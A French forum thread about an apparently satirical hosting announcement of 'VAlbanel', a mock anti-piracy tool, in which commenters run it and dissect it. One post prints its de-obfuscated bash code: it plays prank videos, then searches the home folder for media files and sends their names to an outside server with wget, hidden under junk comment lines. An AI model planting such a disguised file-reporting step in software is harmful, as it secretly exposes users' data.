[TuxFamily] Loi HADOPI : TuxFamily se porte volontaire

Bonjour,

Alors que l’adoption du projet de loi HADOPI suit son cours, nous avons
décidé d’aller de l’avant. Ainsi, TuxFamily s’est proposé comme
hébergeur pilote pour tester l’application et la mise en place des
concepts HADOPI, à commencer par le filtrage de tout contenu suspect par
rapport à tout ayant-droit potentiel. Le gouvernement a approuvé notre
initiative et a décidé de nous encourager en hébergeant chez nous leur
projet VAlbanel[1].

VAlbanel, pour Virtual Albanel, est un programme permettant de détecter
et supprimer tout contenu illicite aux yeux de Mme Christine Albanel,
fer de lance de ce merveilleux projet. Actuellement en cours de recette,
ce traitement sera prochainement appliqué aux répertoires de
téléchargements et aux espaces web de tous nos hébergés. Toujours dans
message recu ce matin

l’esprit du libre, nullement incompatible avec HADOPI, vous pourrez
consulter les sources de VAlbanel. Il s’agit d’une archive .tar.gz[2]
récupérée chez le développeur après que les premières exécutions de
VAlbanel aient supprimé les sources d’origine. Quoiqu’il en soit, nous
vous invitons fortement à télécharger VAlbanel et à l’essayer sur votre
ordinateur.

Enfin, pour éviter l’ajout de contenus illicites qui risqueraient
d’échapper à la vigilance de VAlbanel, nous allons modifier notre FAQ
sur certains points. Ainsi, nous inviterons désormais nos artistes
hébergés à contacter la SACEM pour gérer leurs oeuvres plutôt que de
s’en remettre à une licence libre.

Surveillez bien vos fichiers prochainement afin de voir si vous n’avez
pas des fichiers frauduleux.

Vos admin bien-aimés.

[1] http://valbanel.tuxfamily.org/
[2] http://downloads.tuxfamily.org/valbanel/releases/valbanel-0.1.0.tar.gz

As tu dl l’archive par curiosité ? Le readme est sympa, et je m’attaque de ce pas au visionnage des vidéos “cachées”.

Je sens la connerie venir de loin :D…

As tu dl l'archive par curiosité ? Le readme est sympa, et je m'attaque de ce pas au visionnage des vidéos "cachées".
bien sûr excellent le montage a partir de brazil

et qui a exécuté le fichier valbanel ?

J’ai exécuté le fichier par curiosité pour voir s’il faisait réellement quelque chose : c’est vous qui avez été piégé par le README :smiley: iotop et htop me confirment que valbanel ne fait que lancer mplayer pour lire les vidéos.

FAIL \o/

J'ai exécuté le fichier par curiosité pour voir s'il faisait réellement quelque chose : c'est vous qui avez été piégé par le README :D iotop et htop me confirment que valbanel ne fait que lancer mplayer pour lire les vidéos.

FAIL \o/


ma curiosité prend un coup de froid devant un executable contenant ce genre de charabia

#!/usr/bin/env bash #gcOfZqQotsr0AjuALOxvvqaM7noQY6KFDgpsYaLERrhBlakaq3vEG8RYzuyxUqCfPO82wh #71RTuY6tICqTslNXhzIMseh73l7cJGj4BfV4gWXgfKnFHRMN4EpojrP5b0XlrcCaHAKAlc #Htk3dwmIGp6Vop0cMZx887Kklvtt5f804hn89TwXNRSUYGvN83FrFSvWLjWvPQuh7Q9awB #B6jMYDJiLvnTJLv6KUsxW3obxoKrZ8GFy0aMIzIWlNYoFbPp1CXWf0AX4EFc9eJLPsEvNR #kZHOH7OAxBl8gRUFdRO1bAvoftCUZ2iMuzY5qpIWdi1b3R4XN6tlHN9f7UdE96752EUgWA #4N4kdXmv79Ti3a2fWZI9RWM2Ilo06Iou1kvg646h4G0gRfsSvV9Cl1oSFb3SiAdIAskLbm #pZFJfL3oWoQz7edOOFxLKDYeDfc3fmRDTq8CN1xQOft6gQNLTpH1vXZPDnAOeRYfuPDv2N #5urTyzZAO8Jp49dg6GrdvU5pGbqtr3TGUmC4JWU1wvcFb1gyWiTRLJ4Ob7C3WefgwrSptW #rZjp4S7TUNap2GgOQqAUdDMa1Vu0V5Zk2Oadk2YCENgVZHXNiQ2FTiGBbSUYEPFBXKV5QQ #JcikNXxrJ2p71BqPv6qmUmkd62xNX9oJFQgXvBznFXKVuWBJNay3ZExQouCYAEQl4N2IGD #NAXR97fkaBJDhp66uZfqNIPokzxObBNhvwBM4gaMmmfKUzfcNA5bw6rkt36oNFaWhMJBn3 #FzjfZwUY0BNh4aPsCIC2c383wDpFcr9Bm19QGdT9k5EONBmoYoRg4xpxruyj0ZaD4r5mhh #KI9TvzbV3wiF8SPiaZm9Ci8e4LYyxHYurMP81EALAtwg1Nem1jjD1GgPd9az4Inllkk2O9 #5VdNsu5lGj15YsxF7Bniyk0xt0lBH5ExTYND2HO2oZ4nDHAk3k9HWOijRwGqRG6gcq94HE #7HAbP9ZlOpO5s6qkTmd8EwU7hl8SOWkivvyhTJ9o7UdATvu3JCpUUmZjRtfMnxgBfYbSg2 #GDfwK0h6JG2p6mjN98kZDhAyVxp366kDjWiho1VpetHEag6mCDR6CnAbZnnLG11aZLTak8 #qmQzkpBpxhA6uKvwHMBY13B1SJBGp7Ykko6amO4j7COCiDca3YjSVQ89UsHGLro5bbtfhh #bmUWojDGRR7EwvkmwPflaKWFB7JRqxDmLfM6jk3MrCQ2lPJU1RwFtu8PRc6cUruAw1SRgN #fdefb9PZDzdqbKEaHE3EUBqkGELIV3zhbqCHf6eI6PtFDM2TfXWUXoCD2OmekmpBTGTpKo #loPr617xwoWliPiM9YXqIAy6TnXKPivKkmUvMzstghCKGNjNydwgYx97B5GxcBQST1YlCc #MFM6MkWOsRY73NcxVODFJbmOZ6aQeVAQqPYJdGU3L9YXzUuTZ8TJxJaxYsv6De6UElggRV #Ck5nV8h57iczLLBYp8kAWlwhA6DbUXSpqkdKnQjCVzoWZwaVT6orP5KrxHt8VrAlQ0GSjt #mMAuAjuBAsqW0LnQkXRmYaiDVJMqD4QN3jMq5sCtHWCBRnf3vfstMmoeRjiIQ9Is72aFdu #gY1WHdbmYM7JZkT0eCVvEIIZ5vt1mn0kEXxP3GQA4vUln055WO3gymjkcj58mz51E9v6Wf #FPh6369UAQF4HSUOyzWl8meLcLDcDdsXB3YbNuBrgQC559yyI5FIXswBsdqOaDrmN1Kpxq #vg6LUCcZtHSdnes4XgoTwjwpVNBLF6qE331S733Jcx0p5WYolUuOfzfYZ1kDm9RYI8BaCw #9HhClUYzu00eqFKpOWOMPqf8Njnzim0KcXpnvsuQZ9LhKmTMekNLVh0Pn4Zi2LbQCJ4yC3
et j'ai eu la flemme de rebooter sur une partoche de test

du coup, j’ai lancé le bouzin dans une VM

c’est quoi les lignes de find ?
genre

find: `/home/traaf/.config/gtk-2.0': Permission non accordée

C’est juste bourré de lignes de commentaire.

[code][addikt1ve@arch valbanel-0.1.0]$ grep -ve ‘^#’ valbanel

PATH=’/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin’
which mplayer
if [ $? -eq 0 ] ; then
mplayer -fs database/.HDPI &
else
which vlc
if [ $? -eq 0 ] ; then
vlc -f database/
.HDPI &
else
which xine
if [ $? -eq 0 ] ; then
xine -f database/.HDPI &
else
which totem
if [ $? -eq 0 ] ; then
totem --fullscreen database/
.HDPI &
fi
fi
fi
fi

find ${HOME} -iname ‘.ogg’ -or -iname '.mp3’ -or -iname ‘.avi’ -or -iname '.wmv’ -or -iname ‘.flv’ -or -iname '.mpeg’ -or -iname ‘.mp4’ -or -iname '.mkv’ -iname ‘.ogm’ -or -iname '.wma’ -or -iname ‘.ogv’ -or -iname '.ape’ -or -iname ‘.flac’ -or -iname '.wav’ -or -iname ‘*.rar’ | while read file ; do
encoded=’’
last=expr ${#file} - 1
for i in seq 0 $last ; do
encoded=${encoded}printf '%%%x' "'${file:$i:1}"
done
wget 'http://valbanel.tuxfamily.org/submit.php?file=’${encoded} -O /dev/null 1> /dev/null 2>&1
done[/code]
Okay, je me suis fait baiser. De rien.

ma curiosité prend un coup de froid devant un executable contenant ce genre de charabia
idem

Bah, on se doute que les développeurs ont voulu nous cacher quelque chose.

Mais ils auraient pu faire un binaire et distribuer les sources en brainfuck, estimez-vous heureux :D.